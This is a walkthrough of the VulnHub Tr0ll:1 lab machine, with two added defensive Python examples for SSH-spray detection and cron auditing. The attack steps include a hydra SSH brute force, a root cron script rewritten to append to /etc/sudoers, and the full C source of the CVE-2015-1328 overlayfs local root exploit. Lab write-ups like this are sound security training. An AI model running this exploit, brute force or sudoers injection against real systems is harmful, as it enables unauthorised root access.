VulnHub machine walkthrough [Tr0ll-1]

Name

Name: Tr0ll: 1
Release date: 14 August 2014

Download

  • Download: http://overflowsecurity.com/files/Tr0ll.rar
  • Download (Mirror): https://download.vulnhub.com/tr0ll/Tr0ll.rar
  • Download (Torrent): https://download.vulnhub.com/tr0ll/Tr0ll.rar.torrent

Description

Tr0ll was inspired by the constant trolling of the machines in the OSCP labs. The goal is simple: gain root and get Proof.txt from the /root directory. Not for the easily frustrated! Fair warning, there be trolls ahead! Difficulty: beginner. Type: boot2root.

Special thanks to @OS_Eagle11 and @superkojiman for suffering through the testing from start to finish! The machine should pull an IP over DHCP; if there are any problems, contact me for the password to get it working. Feedback is always appreciated! Maleus

Freenode-Maleus

MD5SUM (Tr0ll.rar): 318fe0b1c0dd4fa0a8dca43edace8b20

Information gathering

Start with nmap:

root@kali:~# nmap -sV -p- -v 192.168.66.15
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
root@kali:~# nmap -A -p 21,22,80 -v 192.168.66.15 --script=vuln -T4
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /robots.txt: Robots file
|_ /secret/: Potentially interesting folder
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.7:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
| CVE-2014-0226 6.8 https://vulners.com/cve/CVE-2014-0226
| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
| CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161
| CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736
| CVE-2014-3523 5.0 https://vulners.com/cve/CVE-2014-3523
| CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185
| CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109
| CVE-2014-0118 4.3 https://vulners.com/cve/CVE-2014-0118
| CVE-2014-0117 4.3 https://vulners.com/cve/CVE-2014-0117
| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612

Enumeration turned up a few interesting things:

  • Anonymous FTP login is allowed
  • The HTTP service has two interesting paths: robots.txt and /secret/

Anonymous FTP

There is a file lol.pcap; in it, a text file named secret_stuff.txt can be seen being pushed to the FTP server. That file contains the text:

150 Here comes the directory listing.

-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt

Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P

Sucks, you were so close... gotta TRY HARDER!

150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).

Nothing useful was found on the web server under that path. Going back to the message in the text file recovered from the PCAP: sup3rs3cr3tdirlol is just leetspeak for supersecretdirlol, so I checked whether it could be a URL path on the HTTP service. /sup3rs3cr3tdirlol/ exists and contains a single file.

Checking the file type shows it is a binary. Try running it.

root@kali:~/vulnhub/troll# file roflmao
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped

No need to reverse the binary: when it runs, there is no memory address 0x0856BF involved. So try 0x0856BF once more as a URL path on the HTTP service.

root@kali:~/vulnhub/troll# ./roflmao 
Find address 0x0856BF to proceedr

Two web directories were found.

The /0x0856BF/good_luck/ directory

which_one_lol.txt contains the following entries:

maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow

The /0x0856BF/this_folder_contains_the_password/ directory

Pass.txt contains the following:

Good_job_:)

Exploitation

These two files are probably a set of usernames and a password. First, use the first file as the user list and the second as the password list, and brute-force SSH with hydra:

root@kali:~/vulnhub/troll# hydra -s 22 -v -V -L users -P pass -e n -t 1 -w 30 192.168.66.15 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-31 03:34:11
[DATA] max 1 task per 1 server, overall 1 task, 20 login tries (l:10/p:2), ~20 tries per task
[DATA] attacking ssh://192.168.66.15:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://maleus@192.168.66.15:22
[INFO] Successful, password authentication is supported by ssh://192.168.66.15:22
[ATTEMPT] target 192.168.66.15 - login "maleus" - pass "" - 1 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "maleus" - pass "Good_job_:)" - 2 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "ps-aux" - pass "" - 3 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "ps-aux" - pass "Good_job_:)" - 4 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "felux" - pass "" - 5 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "felux" - pass "Good_job_:)" - 6 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "Eagle11" - pass "" - 7 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "Eagle11" - pass "Good_job_:)" - 8 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "genphlux" - pass "" - 9 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "genphlux" - pass "Good_job_:)" - 10 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "usmc8892" - pass "" - 11 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "usmc8892" - pass "Good_job_:)" - 12 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "blawrg" - pass "" - 13 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "blawrg" - pass "Good_job_:)" - 14 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "Good_job_:)" - 16 of 21 [child 0] (0/1)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[ATTEMPT] target 192.168.66.15 - login "vis1t0r" - pass "" - 17 of 22 [child 0] (0/2)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[ATTEMPT] target 192.168.66.15 - login "vis1t0r" - pass "Good_job_:)" - 18 of 23 [child 0] (0/3)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[ATTEMPT] target 192.168.66.15 - login "overflow" - pass "" - 19 of 23 [child 0] (0/3)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[ATTEMPT] target 192.168.66.15 - login "overflow" - pass "Good_job_:)" - 20 of 23 [child 0] (0/3)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[REDO-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 21 of 23 [child 0] (1/3)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[REDO-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "Good_job_:)" - 22 of 23 [child 0] (2/3)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[REDO-ATTEMPT] target 192.168.66.15 - login "vis1t0r" - pass "" - 23 of 23 [child 0] (3/3)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[STATUS] attack finished for 192.168.66.15 (waiting for children to complete tests)
1 of 1 target completed, 0 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-31 03:34:49

The trouble starts at user blawrg: whenever hydra fails to log in, the host blocks Kali's IP, so Kali's IP has to be changed before the next users can be tried. The brute force finished, but no user could log in.

Note that the directory containing Pass.txt is called this_folder_contains_the_password. That might mean something, so I tried again using the literal string Pass.txt as the password, and the user overflow can log in with it. WTH!

[RE-ATTEMPT] target 192.168.66.15 - login "vis1t0r" - pass "" - 16 of 20 [child 2] (0/0)
[ATTEMPT] target 192.168.66.15 - login "vis1t0r" - pass "" - 17 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "vis1t0r" - pass "Pass.txt" - 18 of 20 [child 2] (0/0)
[ATTEMPT] target 192.168.66.15 - login "overflow" - pass "" - 19 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "overflow" - pass "Pass.txt" - 20 of 20 [child 0] (0/0)
[22][ssh] host: 192.168.66.15 login: overflow password: Pass.txt
[STATUS] attack finished for 192.168.66.15 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-31 03:41:02
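The host blocking Kali's IP after a run of failures is the defender's side of this step. As an added example, not from the original post, here is a small detector over constructed sshd log lines that flags a burst of failed passwords from one source address and, more importantly, a later successful login from that same address; the year, hostname and the 192.168.66.10 client address are assumptions.

```python
"""Flag SSH password guessing in sshd log lines (added example, not from the post).

The sample log lines below are constructed in standard sshd/syslog format;
the year is assumed because syslog timestamps omit it.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)

def parse_line(line, year=2020):
    """Return (timestamp, result, user, ip), or None for lines not handled here."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def detect(lines, window=timedelta(minutes=5), max_fail=5):
    """Return alerts in order: ("spray", ip, failures, distinct_users) once a
    source reaches max_fail failures inside `window`, and
    ("success_after_failures", ip, user) when that source later logs in."""
    recent = defaultdict(list)   # ip -> failure timestamps still inside window
    users = defaultdict(set)     # ip -> usernames tried
    flagged = set()
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        ts, result, user, ip = ev
        recent[ip] = [t for t in recent[ip] if ts - t <= window]
        if result == "Failed":
            recent[ip].append(ts)
            users[ip].add(user)
            if len(recent[ip]) >= max_fail and ip not in flagged:
                flagged.add(ip)
                alerts.append(("spray", ip, len(recent[ip]), len(users[ip])))
        elif ip in flagged:  # an Accepted login from an already-flagged source
            alerts.append(("success_after_failures", ip, user))
    return alerts

# Constructed sample: a user list tried with one password, then a hit.
SAMPLE_LINES = [
    "Mar 31 03:34:12 troll sshd[2101]: Failed password for invalid user maleus from 192.168.66.10 port 41200 ssh2",
    "Mar 31 03:34:14 troll sshd[2103]: Failed password for invalid user ps-aux from 192.168.66.10 port 41202 ssh2",
    "Mar 31 03:34:16 troll sshd[2105]: Failed password for invalid user felux from 192.168.66.10 port 41204 ssh2",
    "Mar 31 03:34:18 troll sshd[2107]: Failed password for invalid user Eagle11 from 192.168.66.10 port 41206 ssh2",
    "Mar 31 03:34:20 troll sshd[2109]: Failed password for invalid user genphlux from 192.168.66.10 port 41208 ssh2",
    "Mar 31 03:34:22 troll sshd[2111]: Failed password for invalid user usmc8892 from 192.168.66.10 port 41210 ssh2",
    "Mar 31 03:35:01 troll sshd[2113]: Failed password for overflow from 10.0.0.12 port 50100 ssh2",
    "Mar 31 03:41:01 troll sshd[2120]: Accepted password for overflow from 192.168.66.10 port 41300 ssh2",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LINES):
        print(alert)
```

The second alert type is the one worth acting on: a success that follows a spray from the same address is a compromised account, not just noise.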

Login succeeded:

root@kali:~# ssh overflow@192.168.66.15
Enter passphrase for key '/root/.ssh/id_rsa':
overflow@192.168.66.15's password:
Permission denied, please try again.
overflow@192.168.66.15's password:
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

* Documentation: https://help.ubuntu.com/
New release '16.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Wed Aug 13 01:14:09 2014 from 10.0.0.12
Could not chdir to home directory /home/overflow: No such file or directory
$ id
uid=1002(overflow) gid=1002(overflow) groups=1002(overflow)
$ whoami
overflow

Privilege escalation

After logging in I tried to find the flag, but could not. Since overflow is a low-privileged user, privilege escalation is needed before more directories can be reached and the root flag found.

  • The crontabs were checked; none of the files are writable.
  • The tmp directory is empty.

I started checking for world-writable files under var/. Nothing interesting, except for one file.

$ l_path=var/*/*;while [ "$l_path" != / -a "$l_path" != . ]; do ls -ld $l_path; l_path=$(dirname -- "$l_path");done;
...
-rwxrwxrwx 1 root root 23 Aug 13 2014 var/log/cronlog
...

Check var/log/cronlog:

$ cat var/log/cronlog
*/2 * * * * cleaner.py

This is a cron job that runs every 2 minutes. If cleaner.py can be modified so that the system does something on our behalf, overflow's privileges can be escalated. But first, cleaner.py has to be found.

$ find / -name cleaner.py 2>/dev/null | grep "cleaner.py"
/lib/log/cleaner.py

View cleaner.py:

$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()

The Python file was found, and it is writable.

  • Modify cleaner.py

cleaner.py was modified to grant the overflow account sudo rights. Running sudo su from bash then gives a root shell.

overflow@troll:/$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('echo "overflow ALL=(ALL:ALL) ALL" >> /etc/sudoers')
except:
    sys.exit()

Wait 2 minutes... The machine kicked me out; log in again and escalate to root.

$ sudo su

[sudo] password for overflow:
Sorry, try again.
[sudo] password for overflow:
root@troll:/# id
uid=0(root) gid=0(root) groups=0(root)
root@troll:/# whoami
root
root@troll:/# pwd
/
root@troll:/# cd /root
root@troll:~# ls
proof.txt
root@troll:~# cat proof.txt
Good job, you did it!


702a8c18d29c6f3ca0d99ef5712bfbdc
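From the defender's side, the weakness used above (a root cron job whose script any user can edit) is something to audit for routinely. The following added example, not from the original post, parses crontab lines of the shape seen in var/log/cronlog, resolves each command against a search path and reports entries whose script or script directory is world-writable; the /lib/log search-path entry and the temporary fixture files are assumptions.

```python
"""Audit cron entries whose command resolves to a world-writable file.

Added example, not from the original post. It handles the five-field
crontab shape seen in var/log/cronlog; /lib/log in the search path is an
assumption taken from where cleaner.py lived on this box.
"""
import os
import stat
import tempfile

DEFAULT_SEARCH = ["/usr/local/sbin", "/usr/local/bin", "/usr/sbin",
                  "/usr/bin", "/sbin", "/bin", "/lib/log"]

def parse_cron_line(line):
    """Return (schedule, command) for a five-field crontab line, else None."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split(None, 5)
    return (" ".join(fields[:5]), fields[5]) if len(fields) == 6 else None

def resolve_command(command, search_path):
    """Resolve the command's first word to a file PATH-style; None if absent."""
    first = command.split()[0]
    if os.path.isabs(first):
        return first if os.path.isfile(first) else None
    for d in search_path:
        candidate = os.path.join(d, first)
        if os.path.isfile(candidate):
            return candidate
    return None

def world_writable(path):
    return bool(os.stat(path).st_mode & stat.S_IWOTH)

def audit_crontab(text, search_path=DEFAULT_SEARCH):
    """Return (schedule, command, path, reason) for every risky entry."""
    findings = []
    for line in text.splitlines():
        parsed = parse_cron_line(line)
        if parsed is None:
            continue
        schedule, command = parsed
        path = resolve_command(command, search_path)
        if path is None:
            findings.append((schedule, command, None, "command not found in search path"))
        elif world_writable(path):
            findings.append((schedule, command, path, "script is world-writable"))
        elif world_writable(os.path.dirname(path)):
            findings.append((schedule, command, path, "script directory is world-writable"))
    return findings

def demo():
    """Constructed fixture: world-writable cleaner.py next to a 0755 backup.sh."""
    root = tempfile.mkdtemp()
    bad, good = os.path.join(root, "cleaner.py"), os.path.join(root, "backup.sh")
    for p in (bad, good):
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
    os.chmod(bad, 0o777)   # -rwxrwxrwx, the mode found on the machine
    os.chmod(good, 0o755)
    crontab = "# cleanup\n*/2 * * * * cleaner.py\n0 3 * * * backup.sh --full\n*/5 * * * * missing.py\n"
    return audit_crontab(crontab, [root])
```

An entry that cannot be resolved is reported too, since a command cron cannot find today is one whose name a user-writable directory on the search path could supply tomorrow.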

Privilege escalation 2

Linux kernel privilege escalation

Reference: Linux-Kernel-3.13.0-3.19-Ubuntu-12.04/14.04/14.10/15.04-'overlayfs'-Local-Privilege-Escalation

  • CVE: CVE-2015-1328
/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/wait.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>

#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"

static char child_stack[1024*1024];

static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);

    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
        // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";

    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");

    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }

    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
    return 0;
}

int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;

    fprintf(stderr,"spawning threads\n");

    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");

        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }

            waitpid(pid, &status, 0);

        }

        waitpid(init, &status, 0);
        return 0;
    }

    usleep(300000);

    wait(NULL);

    fprintf(stderr,"child threads done\n");

    fd = open("/etc/ld.so.preload",O_WRONLY);

    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }

    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}

The process is too simple to be worth writing up here.

Summary of takeaways

  • Anonymous FTP login
  • SSH password brute force with hydra
  • Privilege escalation via a cron job plus a world-writable Python script
  • CVE-2015-1328 Linux kernel privilege escalation

Game over

Sorry, this time I still haven't found that Greek guru's idiot-proof one-click pwn script. I am so sorry about this... It's a pity...

The end, to be continued...